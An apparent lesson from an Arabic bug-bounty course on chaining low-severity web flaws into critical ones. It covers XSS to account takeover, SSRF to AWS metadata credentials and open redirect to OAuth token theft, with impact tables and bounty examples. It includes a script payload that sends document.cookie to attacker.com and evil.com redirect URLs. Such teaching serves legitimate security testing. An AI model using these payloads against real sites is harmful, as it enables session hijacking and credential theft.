أمان API والهاتف
تسلسل الثغرات لأقصى تأثير
3 دقيقة للقراءة
الثغرات الفردية منخفضة الخطورة يمكن أن تتجمع في اكتشافات حرجة. تسلسل الثغرات هو ما يفصل الصيادين الجيدين عن العظماء.
لماذا تسلسل الثغرات؟
| ثغرة واحدة | ثغرات متسلسلة |
|---|---|
| خطورة منخفضة-متوسطة | خطورة حرجة |
| مكافأة 100-500 دولار | مكافأة 5,000-50,000+ دولار |
| "معلوماتي" | "اختراق كامل" |
| غالباً تُرفض | دائماً تُرتب كأولوية |
السلاسل الشائعة
XSS → استيلاء الحساب
1. ابحث عن stored XSS في ملف المستخدم
2. حقن حمولة لسرقة كوكيز الجلسة
3. الضحية يعرض الملف، الجلسة تُستخرج
4. المهاجم يستخدم الجلسة المسروقة
5. استيلاء كامل على الحساب
الحمولة:
<script>
fetch('https://attacker.com/steal?c='+document.cookie)
</script>
SSRF → بيانات السحابة الوصفية → استيلاء AWS
1. ابحث عن SSRF في ميزة جلب URL
2. الوصول لـ http://169.254.169.254/latest/meta-data/
3. استخراج بيانات اعتماد دور IAM
4. استخدام بيانات الاعتماد للوصول لموارد AWS
5. دلاء S3، مثيلات EC2 مخترقة
تصعيد التأثير:
- SSRF وحده: متوسط
- مع البيانات الوصفية: عالي
- مع الوصول لبيانات الاعتماد: حرج
IDOR → كشف بيانات جماعي
1. ابحث عن IDOR يعيد سجلاً واحداً
2. عدد المعرفات لتفريغ جميع السجلات
3. سلسل مع SQLi أو التصفح غير الصحيح
4. استخراج قاعدة البيانات بأكملها
5. PII لجميع المستخدمين مكشوفة
إعادة توجيه مفتوحة → سرقة رمز OAuth
1. ابحث عن إعادة توجيه مفتوحة: /redirect?url=evil.com
2. استخدم في تدفق OAuth: /oauth?redirect_uri=/redirect?url=evil.com
3. الضحية يصرح للتطبيق
4. الرمز يُرسل لـ evil.com عبر إعادة التوجيه
5. الوصول للحساب
كشف معلومات → تجاوز تسجيل الدخول
1. ابحث عن نقطة نهاية debug مكشوفة ببريد المستخدمين
2. رموز إعادة تعيين كلمة المرور مسربة في السجلات
3. اربط البريد ← الرمز
4. أعد تعيين كلمة مرور أي مستخدم
5. حساب المدير مخترق
مثال سلسلة معقدة
سلسلة هجوم كاملة: ثغرة 100 دولار → حرجة 50,000 دولار
الخطوة 1: كشف معلومات منخفض الخطورة
- نقطة نهاية /debug مكشوفة تكشف IP داخلي
الخطوة 2: SSRF عبر إنشاء PDF
- /generate-pdf?url= يقبل URLs داخلية
- الوصول للشبكة الداخلية عبر IP المكشوف
الخطوة 3: وُجد Jenkins داخلي
- Jenkins على IP الداخلي بدون مصادقة
- يمكن تنفيذ أوامر عشوائية
الخطوة 4: الوصول لبيانات الاعتماد
- بيئة Jenkins لديها بيانات اعتماد AWS
- سلاسل اتصال قاعدة البيانات مكشوفة
الخطوة 5: اختراق كامل
- وصول AWS → دلاء S3 → بيانات العملاء
- وصول قاعدة البيانات → تفريغ كامل للبيانات
منهجية التسلسل
الخطوة 1: جرد جميع الاكتشافات
| المعرف | الثغرة | الخطورة | ملاحظات |
|--------|--------|---------|---------|
| 1 | إعادة توجيه مفتوحة | منخفضة | تدفق تسجيل الدخول |
| 2 | SSRF (أعمى) | متوسطة | مولد PDF |
| 3 | كشف معلومات | معلوماتي | أرقام الإصدارات |
| 4 | JWT ضعيف | متوسطة | لا تحقق من التوقيع |
الخطوة 2: ارسم الاتصالات المحتملة
إعادة توجيه مفتوحة → تدفق OAuth؟
SSRF → خدمات داخلية؟
كشف معلومات → إصدار → CVE معروف؟
JWT ضعيف → تزوير الرمز → وصول المدير؟
الخطوة 3: اختبر التركيبات
- هل يمكن للثغرة أ تمكين الثغرة ب؟
- هل يمكن لمخرج الثغرة ب التغذية للثغرة ج؟
- ما أسوأ سيناريو إذا نجح كل شيء؟
الخطوة 4: وثق السلسلة
## سلسلة الثغرات: استيلاء الحساب عبر XSS + CSRF
### الثغرات الفردية
1. Stored XSS في bio الملف الشخصي (متوسطة)
2. لا حماية CSRF على تغيير البريد (متوسطة)
### سلسلة الهجوم
1. المهاجم يحقن حمولة XSS في ملفه الشخصي
2. الحمولة تُنفذ عندما يعرض الضحية الملف
3. XSS يُفعل تغيير البريد لبريد المهاجم
4. إعادة تعيين كلمة المرور تُرسل للمهاجم
5. استيلاء كامل على الحساب
### التأثير: حرج
- أي مستخدم يعرض ملف المهاجم يفقد حسابه
جدول مضاعفة التأثير
| الثغرة 1 | + الثغرة 2 | = التأثير |
|---|---|---|
| SSRF | وصول داخلي | حرج |
| XSS | سرقة جلسة | عالي→حرج |
| SQLi | وصول جدول المدير | حرج |
| IDOR | تعداد جماعي | عالي |
| تسريب معلومات | كشف بيانات الاعتماد | حرج |
| إعادة توجيه مفتوحة | OAuth | عالي |
أمثلة المكافآت
| الشركة | السلسلة | المكافأة |
|---|---|---|
| Uber | SSRF → AWS → بيانات | 25,000 دولار |
| Shopify | XSS → CSRF → ATO | 15,000 دولار |
| PayPal | IDOR → تسريب جماعي | 12,000 دولار |
| GitLab | معلومات → SQLi → RCE | 35,000 دولار |
نصائح احترافية
- لا تتجاهل الثغرات منخفضة الخطورة: إنها بداية السلاسل
- ارسم تدفق التطبيق: افهم كيف تتحرك البيانات
- فكر كمهاجم: ما أسوأ ما يمكنك فعله؟
- وثق كل شيء: السلاسل تحتاج سرديات واضحة
- أوصل التأثير: ساعد الفرز على فهم الخطورة
نصيحة احترافية: أفضل السلاسل تُروى كقصص. "المهاجم يفعل X، مما يمكّن Y، مؤدياً لاختراق Z." اجعل المسار للتأثير واضحاً تماماً.
الوحدة التالية: التقارير الاحترافية وبناء مسيرتك. :::